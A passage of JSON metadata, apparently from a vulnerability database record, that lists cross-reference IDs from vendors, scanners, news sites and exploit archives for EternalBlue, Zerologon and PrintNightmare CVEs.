"14BD2DBD-3A91-55FC-9836-14EF9ABF56CF", "1E42289A-77F8-55A2-B85E-83CAA00CE951", "20466D13-6C5B-5326-9C8B-160E9BE37195", "21F83D93-118D-50C7-A5C0-B2069237666E", "2255B39F-1B91-56F4-A323-8704808620D3", "28D42B84-AB24-5FC6-ADE1-610374D67F21", "2D16FB2A-7A61-5E45-AAF8-1E090E0ADCC0", "2E71FF50-1B48-5A8E-9212-C4CF9399715C", "3399B834-8492-5C0C-AA14-7F120BA37AF6", "3F400483-1F7E-5BE5-8612-4D55D450D553", "49EC151F-12F0-59CF-960C-25BD54F46680", "4A3F2A96-B727-5EF1-B1C1-FE041BA02E28", "4CB63A18-5D6F-57E3-8CD8-9110CF63E120", "4E279194-AC85-5607-A943-AC23EADADEF7", "50FA6373-CBCD-5EF5-B37D-0ECD621C6134", "5AE71695-062E-5DBA-9A16-69BD0C7D1384", "5B025A0D-055E-552C-B1FB-287C6F191F8E", "5E80DB20-575C-537A-9B83-CCFCCB55E448", "63C36F7A-5F99-5A79-B99F-260360AC237F", "64AAF745-D50D-575C-B3FF-A09072475502", "6FB0B63E-DE9A-5065-B577-ECA3ED5E9F4B", "7078ED42-959E-5242-BE9D-17F2F99C76A8", "7C3B421E-ED99-5C5F-B2BA-4418307C0EBF", "8542D571-7253-5609-BC52-CBCB5F40929A", "86F04665-0984-596F-945A-3CA176A53057", "879CF3A7-ECBC-552A-A044-5E2724F63279", "87B06BBD-7ED2-5BD2-95E1-21EE66501505", "8EDE916A-F04B-59F0-A88D-13DEF969DC00", "939F3BE7-AF69-5351-BD56-12412FA184C5", "98CA9A39-577D-51F2-B8B9-B20E80D94173", "9C9BD402-511C-597D-9864-647131FE6647", "A24AC1AC-55EF-51D8-B696-32F369DCAB96", "AAD37CB5-B2C3-5908-B0D3-052CF47F6D25", "AEF449B8-DC3E-544A-A748-5A1C6F7EBA59", "B03B4134-B4C9-5B2D-BA55-EEEA540389F4", "B7C1C535-3653-5D12-8922-4C6A5CCBD5F3", "B8D9E2C0-202B-5806-88D2-B0E797582618", "BA280EB1-2FF9-52DA-8BA4-A276A1158DD8", "BBE1926E-1EC7-5657-8766-3CA8418F815C", "BDFBDA81-0DEB-5523-B538-F23C3B524986", "C5B49BD0-D347-5AEB-A774-EE7BB35688E9", "C7CE5D12-A4E5-5FF2-9F07-CD5E84B4C02F", "C7F6FB3B-581D-53E1-A2BF-C935FE7B03C8", "C841D92F-11E1-5077-AE70-CA2FEF0BC96E", "CD2BFDFF-9EBC-5C8F-83EC-62381CD9BCD5", "CF07CF32-0B8E-58E5-A410-8FA68D411ED0", "D089579B-4420-5AD5-999F-45063D972E66", "D178DAA4-01D0-50D0-A741-1C3C76A7D023", "D3C401E0-D013-59E2-8FFB-6BEF41DA3D1B", "DEC5B8BB-1933-54FF-890E-9C2720E9966E", "DF28DCE7-CCFF-5653-81BA-719525BE09AD", "E235B3DF-990F-5508-9496-90462B45125D", "E7D3FB75-54DE-5CD8-83D6-438BFC7CFA74", "E82ECEEF-07B8-5340-BAC6-FA5B0E964772", "E9F25671-2BEF-5E8B-A60A-55C6DD9DE820", "F085F702-F1C3-5ACB-99BE-086DA182D98B", "F1347375-6380-5145-9881-486B76875649", "F1B229EB-2178-53B9-839E-BA0B916376A2", "F472C105-E3B1-524A-BBF5-1C436185F6EE", "F92F972D-7309-5D0B-BCC2-054883AE83E9", "FBC9D472-5E25-508D-AB6E-B3197FCFED2D", "FC661572-B96B-5B2C-B12F-E8D279E189BF"]}, {"type": "hivepro", "idList": ["HIVEPRO:8D09682ECAC92A6EA4B81D42F45F0233", "HIVEPRO:8DA601C83DB9C139357327C06B06CB36", "HIVEPRO:E7E537280075DE5C0B002F1AF44BE1C5"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS", "HUAWEI-SA-20201105-01-NETLOGON"]}, {"type": "ibm", "idList": ["8190BE7075BCD3ECD99D09840619467A00B84599B985C4B2AB342389339984B1"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA10979", "KLA11902", "KLA11929", "KLA11931", "KLA12213", "KLA12214"]}, {"type": "kitploit", "idList": ["KITPLOIT:232707789076746523", "KITPLOIT:9146046356497464176"]}, {"type": "krebs", "idList": ["KREBS:1BEFD58F5124A2E4CA40BD9C1B49B9B7", "KREBS:3CC49021549439F95A2EDEB2029CF54E", "KREBS:831FD0B726B800B2995A68BA50BD8BE3", "KREBS:952ACEBFD55EBD076910C6B233491883", "KREBS:A8F0DD3F6E965A3A66B2CCBB003ACF62"]}, {"type": "mageia", "idList": ["MGASA-2020-0380"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:42218FB85F05643E0B2C2C7D259EFEB5", "MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:78E91E28F51B0A15B6CA53FF8A9B480B", "MALWAREBYTES:7F8FC685D6EFDE8FC4909FDA86D496A5", "MALWAREBYTES:9F3181D8BD5EF0E44A305AF69898B9E0", "MALWAREBYTES:DA59FECA8327C8353EA012EA1B957C7E", "MALWAREBYTES:DB34937B6474073D9444648D34438225"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY-ADMIN-DCERPC-CVE_2020_1472_ZEROLOGON-", "MSF:EXPLOIT-WINDOWS-DCERPC-CVE_2021_1675_PRINTNIGHTMARE-"]}, {"type": "mmpc", "idList": ["MMPC:4A6B394DCAF12E05136AE087248E228C", "MMPC:D6D537E875C3CBD84822A868D24B31BA", "MMPC:E537BA51663A720821A67D2A4F7F7F0E", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0144", "MS:CVE-2020-1472", "MS:CVE-2021-1675", "MS:CVE-2021-34527"]}, {"type": "mskb", "idList": ["KB4013389", "KB4601315", "KB4601318", "KB4601319", "KB4601345", "KB4601347", "KB4601348", "KB4601349", "KB4601357", "KB4601363", "KB4601384", "KB5004945", "KB5004946", "KB5004947", "KB5004948", "KB5004950", "KB5004951", "KB5004953", "KB5004954", "KB5004955", "KB5004956", "KB5004958", "KB5004959", "KB5004960"]}, {"type": "msrc", "idList": ["MSRC:239E65C8BEB88185329D9990C80B10DF", "MSRC:5B84BD451283462DC81D4090EFE66280", "MSRC:96F2FB0D77EED0ABDED8EBD64AEBEA09", "MSRC:CB3C49E52425E7C1B0CFB151C6D488A4"]}, {"type": "mssecure", "idList": ["MSSECURE:4A6B394DCAF12E05136AE087248E228C", "MSSECURE:D6D537E875C3CBD84822A868D24B31BA", "MSSECURE:E537BA51663A720821A67D2A4F7F7F0E"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "AL2_ALAS-2021-1585.NASL", "ALA_ALAS-2021-1469.NASL", "ALMA_LINUX_ALSA-2021-1647.NASL", "CENTOS8_RHSA-2021-1647.NASL", "CENTOS_RHSA-2020-5439.NASL", "DEBIAN_DLA-2463.NASL", "EULEROS_SA-2020-2171.NASL", "EULEROS_SA-2020-2181.NASL", "EULEROS_SA-2020-2299.NASL", "EULEROS_SA-2020-2396.NASL", "EULEROS_SA-2021-1050.NASL", "EULEROS_SA-2021-1118.NASL", "EULEROS_SA-2021-1517.NASL", "EULEROS_SA-2021-1533.NASL", "EULEROS_SA-2021-1625.NASL", "EULEROS_SA-2021-1635.NASL", "EULEROS_SA-2021-2168.NASL", "FEDORA_2020-0BE2776ED3.NASL", "FEDORA_2020-77C15664B0.NASL", "FEDORA_2020-A1D139381A.NASL", "FREEBSD_PKG_24ACE516FAD711EA8D8C005056A311D1.NASL", "GENTOO_GLSA-202012-24.NASL", "MS17-010.NASL", "NETLOGON_ZEROLOGON_CVE-2020-1472.NBIN", "NEWSTART_CGSL_NS-SA-2021-0024_SAMBA.NASL", "NEWSTART_CGSL_NS-SA-2021-0167_SAMBA.NASL", "NEWSTART_CGSL_NS-SA-2022-0058_SAMBA.NASL", "OPENSUSE-2020-1513.NASL", "OPENSUSE-2020-1526.NASL", "ORACLELINUX_ELSA-2020-5439.NASL", "ORACLELINUX_ELSA-2021-1647.NASL", "REDHAT-RHSA-2020-5439.NASL", "REDHAT-RHSA-2021-1647.NASL", "REDHAT-RHSA-2021-3723.NASL", "SL_20201215_SAMBA_ON_SL7_X.NASL", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "SMB_NT_MS17-010.NASL", "SMB_NT_MS20_AUG_4565349.NASL", "SMB_NT_MS20_AUG_4571694.NASL", "SMB_NT_MS20_AUG_4571703.NASL", "SMB_NT_MS20_AUG_4571729.NASL", "SMB_NT_MS20_AUG_4571736.NASL", "SMB_NT_MS21_FEB_4601347.NASL", "SMB_NT_MS21_JUL_5004945.NASL", "SMB_NT_MS21_JUL_5004946.NASL", "SMB_NT_MS21_JUL_5004947.NASL", "SMB_NT_MS21_JUL_5004948.NASL", "SMB_NT_MS21_JUL_5004950.NASL", "SMB_NT_MS21_JUL_5004951.NASL", "SMB_NT_MS21_JUL_5004958.NASL", "SMB_NT_MS21_JUL_5004959.NASL", "SMB_NT_MS21_JUL_5004960.NASL", "SMB_NT_MS21_JUL_CVE-2021-34527_REG_CHECK.NASL", "SUSE_SU-2020-2719-1.NASL", "SUSE_SU-2020-2720-1.NASL", "SUSE_SU-2020-2721-1.NASL", "SUSE_SU-2020-2722-1.NASL", "SUSE_SU-2020-2724-1.NASL", "SUSE_SU-2020-2730-1.NASL", "UBUNTU_USN-4510-1.NASL", "UBUNTU_USN-4559-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2021"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-5439", "ELSA-2021-1647"]}, {"type": "osv", "idList": ["OSV:DLA-2463-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:142602", "PACKETSTORM:142603", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:160127", "PACKETSTORM:167261"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:8FD1C9A0D76A3084445136A0275847C0"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:01C65083E501A6BAFB08FCDA1D561012", "QUALYSBLOG:12BC089A56EB28CFD168EC09B070733D", "QUALYSBLOG:192411B44569225E2F2632594DC4308C", "QUALYSBLOG:282A52EA9B1F4C4F3F084197709217B0", "QUALYSBLOG:3B1C0CD4DA2F528B07C93411EA447658", "QUALYSBLOG:485C0D608A0A8288FF38D618D185D2A2", "QUALYSBLOG:5A5094DBFA525D07EBC3EBA036CDF81A", "QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8", "QUALYSBLOG:9D071EBE42634FFBB58CB68A83252B41", "QUALYSBLOG:A730164ABD0AA0A58D62EAFAB48628AD", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "QUALYSBLOG:CAF5B766E6B0E6C1A5ADF56D442E7BB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:DE1FEC2B9B661D42DAA0BA398DBFD24E", "QUALYSBLOG:E908D08D4163FD6817C8B71F91A20C57"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:0C3EDBDC537092A20C850F762D5A5856", "RAPID7BLOG:24E0BE5176F6D3963E1824AD4A55019E", "RAPID7BLOG:2FFDE45F01FA44216BE91DD7AFA0D060", "RAPID7BLOG:44EA89871AFF6881B909B9FD0E07034F", "RAPID7BLOG:45A121567763FF457DE6E50439C2605A", "RAPID7BLOG:486F801929E1F794197FC08AE13E4CB5", "RAPID7BLOG:49C18614AD01B6865616A65F734B9F71", "RAPID7BLOG:4B35B23167A9D5E016537F6A81E4E9D4", "RAPID7BLOG:5586742AC0F1C66F56B3583482B0960A", "RAPID7BLOG:5721EC0F74BC2FA3F661282E284C798A", "RAPID7BLOG:57AB78EC625B6F8060F1E6BD668BDD0C", "RAPID7BLOG:5CDF95FB2AC31414FD390E0E0A47E057", "RAPID7BLOG:8882BFA669B38BCF7B5A8A26F657F735", "RAPID7BLOG:8DADA7B6B3B1BA6ED3D6EDBA37A79204", "RAPID7BLOG:C628D3D68DF3AE5A40A1F0C9DFA38860", "RAPID7BLOG:F9B4F18ABE4C32CD54C3878DD17A8630"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "redhat", "idList": ["RHSA-2020:5439", "RHSA-2021:1647", "RHSA-2021:3723"]}, {"type": "redhatcve", "idList": ["RH:CVE-2020-1472"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:AF0C718105190997E9F68ECCA01B467D"]}, {"type": "samba", "idList": ["SAMBA:CVE-2020-1472"]}, {"type": "securelist", "idList": ["SECURELIST:094B9FCE59977DD96C94BBF6A95D339E", "SECURELIST:0C07A61E6D92865F5B58728A60866991", "SECURELIST:73735B62C781261398E44FFF82262BCD", "SECURELIST:830DE5B1B5EBB6AEE4B12EF66AD749F9", "SECURELIST:847981DCB9E90C51F963EE1727E40915", "SECURELIST:86368EF0EA7DAA3D2AB20E0597A62656", "SECURELIST:BB0230F9CE86B3F1994060AA0A809C08", "SECURELIST:C540EBB7FD8B7FB9E54E119E88DB5C48", "SECURELIST:CE501995262A06F4E132DE2F9C2B9B6C"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:1513-1", "OPENSUSE-SU-2020:1526-1"]}, {"type": "symantec", "idList": ["SMNTC-96704"]}, {"type": "talosblog", "idList": ["TALOSBLOG:44F665C3D577FC52EF671E9C0CB1750F", "TALOSBLOG:8CDF0A62E30713225D10811E0E977C1D", "TALOSBLOG:A654303FB4331FDBB91B999EC882BE7A"]}, {"type": "thn", "idList": ["THN:0A61A90DD0F88453854B73FE249BC379", "THN:0C87C22B19E7073574F7BA69985A07BF", "THN:10A732F6ED612DC7431BDC9A3CEC3A29", "THN:2F8F4C57A4BFEE821BF1AB72DB36A273", "THN:42B8A8C00254E7187FE0F1EF2AF6F5D7", "THN:6428957E9DED493169A2E63839F98667", "THN:816878AF6F6091DFFD5EDD6489062840", "THN:849B821D3503018DA38FAFFBC34DAEBB", "THN:9CE630030E0F3E3041E633E498244C8D", "THN:9FD8A70F9C17C3AF089A104965E48C95", "THN:A30AE10A13D33189456EB192DDF2B8C2", "THN:A52CF43B8B04C0A2F8413E17698F9308", "THN:B95DC27A89565323F0F8E6350D24D801", "THN:CAFA6C5C5A34365636215CFD7679FD50", "THN:CF5E93184467C7B8F56A517CE724ABCF", "THN:E18080D17705880B2E7B69B8AB125EA9", "THN:E9454DED855ABE5718E4612A2A750A98", "THN:EA407B51944632C248FEB495594123EA", "THN:F35E41E26872B23A7F620C6D8F7E2334", "THN:F4928090525451C50A1B016ED3B0650F", "THN:F53D18B9EB0F8CD70C9289288AC9E2E1", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "threatpost", "idList": ["THREATPOST:0B290DDF3FE14178760FDC2229CB1383", "THREATPOST:1322630273A25CA5A68246679553E2B8", "THREATPOST:1502920D4F50B0D128077B515815C023", "THREATPOST:199785A97C530FECDF2B53B871FBE1C2", "THREATPOST:23D55C85EA8B442C858FF058C5E25DBC", "THREATPOST:27150C099FB4771B9DED4F6372D27EB7", "THREATPOST:2F655C93B7912A7C776E1DC1D39822D0", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:30D70449EF03FFC5099B5B141FA079E2", "THREATPOST:45F91A2DD716E93AA4DA0D9441E725C6", "THREATPOST:49274446DFD14E2B0DF948DA83A07ECB", "THREATPOST:51A2EB5F46817EF77631C9F4C6429714", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:6B7259AD7487C6D17E0A301E14AEB7CB", "THREATPOST:6F7C157D4D3EB409080D90F02185E728", "THREATPOST:71C45E867DCD99278A38088B59938B48", "THREATPOST:779B904F971138531725D1E57FDFF9DD", "THREATPOST:827A7E3B49365A0E49A11A05A5A29192", "THREATPOST:870C912F079364DE3A8DADFDBE4E42D1", "THREATPOST:891CC19008EEE7B8F1523A2BD4A37993", "THREATPOST:8D4EA8B0593FD44763915E703BC9AB72", "THREATPOST:8D6D4C10987CBF3434080EFF240D2E74", "THREATPOST:933913B1D9B9CF84D33FECFC77C2FDC8", "THREATPOST:98D815423018872E6E596DAA8131BF3F", "THREATPOST:A1A1E1AC8DB384C8FA2988F9A9121141", "THREATPOST:A47D83D4BBBE115E6424755328525B9D", "THREATPOST:A5FC4C5797CA53E30A3426AF0843BFFE", "THREATPOST:A8242348917526090B7A1B23735D5C6C", "THREATPOST:AD8A075328874910E8DCBC149A6CA284", "THREATPOST:ADA9E95C8FD42722E783C74443148525", "THREATPOST:B0EAC6CA3FDF5A249CE4DD7AC3DD46BD", "THREATPOST:BBAE8AE32C2E8EC0271BBA9D0498A825", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:DBA639CBD82839FDE8E9F4AE1031AAF7", "THREATPOST:E95FF75420C541DF65D4D795CF73B5CE", "THREATPOST:F1065D29808C9165285986CCB6DEBB5A", "THREATPOST:F60D403369A535076F39A474F74C925E", "THREATPOST:F9CF34A304B5CA2189D5CEDA09C8B0CB"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:8A87E8F1BA63B9BB2E84C23288C44FDC", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "ubuntu", "idList": ["USN-4510-1", "USN-4510-2", "USN-4559-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2020-1472"]}, {"type": "veracode", "idList": ["VERACODE:27548"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-27802", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-35274"]}]}, "score": {"value": 10.6, "vector": "NONE"}, "backreferences": {"references": [{"type": "almalinux", "idList": ["ALSA-2021:1647"]}, {"type": "amazon", "idList": ["ALAS-2021-1469", "ALAS2-2021-1585"]}, {"type": "archlinux", "idList": ["ASA-202009-17"]}, {"type": "attackerkb", "idList": ["AKB:7C5703D3-9E18-4F5C-A4D2-25E1F09B43CB", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "avleonov", "idList": ["AVLEONOV:28E47C69DA4A069031694EB4C2C931BA", "AVLEONOV:93A5CCFA19B815AE15942F533FFD65C4", "AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7"]}, {"type": "canvas", "idList": ["ETERNALBLUE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:19B4E04F8F1723A4F28FA7A8354698AF", "CARBONBLACK:91F55D2B8B2999589579EACB1542A3E9", "CARBONBLACK:A526657711947788A54505B0330C16A0"]}, {"type": "centos", "idList": ["CESA-2020:5439"]}, {"type": "cert", "idList": ["VU:490028"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0198", "CPAI-2020-0872", "CPAI-2020-1095", "CPAI-2021-0465"]}, {"type": "cisa", "idList": ["CISA:2B970469D89016F563E142BE209443D8", "CISA:433F588AAEF2DF2A0B46FE60687F19E0", "CISA:61F2653EF56231DB3AEC3A9E938133FE", "CISA:7E93687DEED7F2EA7EFAEBA997B30A5D", "CISA:7FB0A467C0EB89B6198A58418B43D50C", "CISA:990FCFCEB1D9B60F5FAA47A1F537A3CB"]}, {"type": "cve", "idList": ["CVE-2017-0144"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2463-1:1381E"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2020-1472"]}, {"type": "exploitdb", "idList": ["EDB-ID:49071"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "fedora", "idList": ["FEDORA:38D8230C58CD", "FEDORA:4A64830CFCDC", "FEDORA:D8A0E3053060"]}, {"type": "fireeye", "idList": ["FIREEYE:399092589F455855881447C60B56C21A"]}, {"type": "freebsd", "idList": ["24ACE516-FAD7-11EA-8D8C-005056A311D1"]}, {"type": "gentoo", "idList": ["GLSA-202012-24"]}, {"type": "githubexploit", "idList": ["042AB58A-C86A-5A8B-AED3-2FF3624E97E3", "04BCA9BC-E3AD-5234-A5F0-7A1ED826F600", "06BAC40D-74DF-5994-909F-3A87FC3B76C8", "07DF268C-467E-54A3-B713-057BA19C72F7", "07E56BF6-A72B-5ACD-A2FF-818C48E4E132", "0CFAB531-412C-57A0-BD9E-EF072620C078", "12E44744-1AF0-523A-ACA2-593B4D33E014", "14BD2DBD-3A91-55FC-9836-14EF9ABF56CF", "20466D13-6C5B-5326-9C8B-160E9BE37195", "2255B39F-1B91-56F4-A323-8704808620D3", "28D42B84-AB24-5FC6-ADE1-610374D67F21", "2D16FB2A-7A61-5E45-AAF8-1E090E0ADCC0", "2E71FF50-1B48-5A8E-9212-C4CF9399715C", "3F400483-1F7E-5BE5-8612-4D55D450D553", "49EC151F-12F0-59CF-960C-25BD54F46680", "4CB63A18-5D6F-57E3-8CD8-9110CF63E120", "50FA6373-CBCD-5EF5-B37D-0ECD621C6134", "5B025A0D-055E-552C-B1FB-287C6F191F8E", "5E80DB20-575C-537A-9B83-CCFCCB55E448", "63C36F7A-5F99-5A79-B99F-260360AC237F", "6FB0B63E-DE9A-5065-B577-ECA3ED5E9F4B", "7078ED42-959E-5242-BE9D-17F2F99C76A8", "879CF3A7-ECBC-552A-A044-5E2724F63279", "87B06BBD-7ED2-5BD2-95E1-21EE66501505", "939F3BE7-AF69-5351-BD56-12412FA184C5", "9C9BD402-511C-597D-9864-647131FE6647", "A24AC1AC-55EF-51D8-B696-32F369DCAB96", "AEF449B8-DC3E-544A-A748-5A1C6F7EBA59", "B7C1C535-3653-5D12-8922-4C6A5CCBD5F3", "BA280EB1-2FF9-52DA-8BA4-A276A1158DD8", "BBE1926E-1EC7-5657-8766-3CA8418F815C", "C5B49BD0-D347-5AEB-A774-EE7BB35688E9", "C7CE5D12-A4E5-5FF2-9F07-CD5E84B4C02F", "C7F6FB3B-581D-53E1-A2BF-C935FE7B03C8", "CF07CF32-0B8E-58E5-A410-8FA68D411ED0", "D178DAA4-01D0-50D0-A741-1C3C76A7D023", "D3C401E0-D013-59E2-8FFB-6BEF41DA3D1B", "DEC5B8BB-1933-54FF-890E-9C2720E9966E", "E9F25671-2BEF-5E8B-A60A-55C6DD9DE820", "F085F702-F1C3-5ACB-99BE-086DA182D98B", "FC661572-B96B-5B2C-B12F-E8D279E189BF"]}, {"type": "hivepro", "idList": ["HIVEPRO:E7E537280075DE5C0B002F1AF44BE1C5"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS", "HUAWEI-SA-20201105-01-NETLOGON"]}, {"type": "ibm", "idList": ["8190BE7075BCD3ECD99D09840619467A00B84599B985C4B2AB342389339984B1"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA10979", "KLA12213", "KLA12214"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "krebs", "idList": ["KREBS:A8F0DD3F6E965A3A66B2CCBB003ACF62"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:78E91E28F51B0A15B6CA53FF8A9B480B"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "mmpc", "idList": ["MMPC:4A6B394DCAF12E05136AE087248E228C", "MMPC:D6D537E875C3CBD84822A868D24B31BA", "MMPC:E537BA51663A720821A67D2A4F7F7F0E", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0144", "MS:CVE-2020-1472", "MS:CVE-2021-1675"]}, {"type": "mskb", "idList": ["KB4601347", "KB5004945"]}, {"type": "msrc", "idList": ["MSRC:5B84BD451283462DC81D4090EFE66280", "MSRC:96F2FB0D77EED0ABDED8EBD64AEBEA09"]}, {"type": "mssecure", "idList": ["MSSECURE:4A6B394DCAF12E05136AE087248E228C", "MSSECURE:D6D537E875C3CBD84822A868D24B31BA", "MSSECURE:E537BA51663A720821A67D2A4F7F7F0E"]}, {"type": "nessus", "idList": ["AL2_ALAS-2021-1585.NASL", "ALA_ALAS-2021-1469.NASL", "CENTOS_RHSA-2020-5439.NASL", "DEBIAN_DLA-2463.NASL", "EULEROS_SA-2021-1050.NASL", "EULEROS_SA-2021-1118.NASL", "FREEBSD_PKG_24ACE516FAD711EA8D8C005056A311D1.NASL", "GENTOO_GLSA-202012-24.NASL", "MS17-010.NASL", "NETLOGON_ZEROLOGON_CVE-2020-1472.NBIN", "OPENSUSE-2020-1526.NASL", "ORACLELINUX_ELSA-2020-5439.NASL", "REDHAT-RHSA-2020-5439.NASL", "SL_20201215_SAMBA_ON_SL7_X.NASL", "SUSE_SU-2020-2719-1.NASL", "SUSE_SU-2020-2720-1.NASL", "SUSE_SU-2020-2721-1.NASL", "SUSE_SU-2020-2722-1.NASL", "SUSE_SU-2020-2724-1.NASL", "SUSE_SU-2020-2730-1.NASL", "UBUNTU_USN-4510-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-5439"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:142602", "PACKETSTORM:142603", "PACKETSTORM:160127"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:8FD1C9A0D76A3084445136A0275847C0"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:192411B44569225E2F2632594DC4308C", "QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:49C18614AD01B6865616A65F734B9F71", "RAPID7BLOG:5586742AC0F1C66F56B3583482B0960A", "RAPID7BLOG:5CDF95FB2AC31414FD390E0E0A47E057", "RAPID7BLOG:C628D3D68DF3AE5A40A1F0C9DFA38860"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "redhat", "idList": ["RHSA-2021:3723"]}, {"type": "redhatcve", "idList": ["RH:CVE-2020-1472"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "samba", "idList": ["SAMBA:CVE-2020-1472"]}, {"type": "securelist", "idList": ["SECURELIST:73735B62C781261398E44FFF82262BCD", "SECURELIST:847981DCB9E90C51F963EE1727E40915", "SECURELIST:CE501995262A06F4E132DE2F9C2B9B6C"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:1513-1"]}, {"type": "symantec", "idList": ["SMNTC-96704"]}, {"type": "talosblog", "idList": ["TALOSBLOG:8CDF0A62E30713225D10811E0E977C1D", "TALOSBLOG:A654303FB4331FDBB91B999EC882BE7A"]}, {"type": "thn", "idList": ["THN:0A61A90DD0F88453854B73FE249BC379", "THN:6428957E9DED493169A2E63839F98667", "THN:816878AF6F6091DFFD5EDD6489062840", "THN:B95DC27A89565323F0F8E6350D24D801", "THN:E9454DED855ABE5718E4612A2A750A98", "THN:EA407B51944632C248FEB495594123EA", "THN:F4928090525451C50A1B016ED3B0650F", "THN:F53D18B9EB0F8CD70C9289288AC9E2E1", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "threatpost", "idList": ["THREATPOST:23D55C85EA8B442C858FF058C5E25DBC", "THREATPOST:27150C099FB4771B9DED4F6372D27EB7", "THREATPOST:30D70449EF03FFC5099B5B141FA079E2", "THREATPOST:45F91A2DD716E93AA4DA0D9441E725C6", "THREATPOST:49274446DFD14E2B0DF948DA83A07ECB", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:8D6D4C10987CBF3434080EFF240D2E74", "THREATPOST:A1A1E1AC8DB384C8FA2988F9A9121141", "THREATPOST:A47D83D4BBBE115E6424755328525B9D", 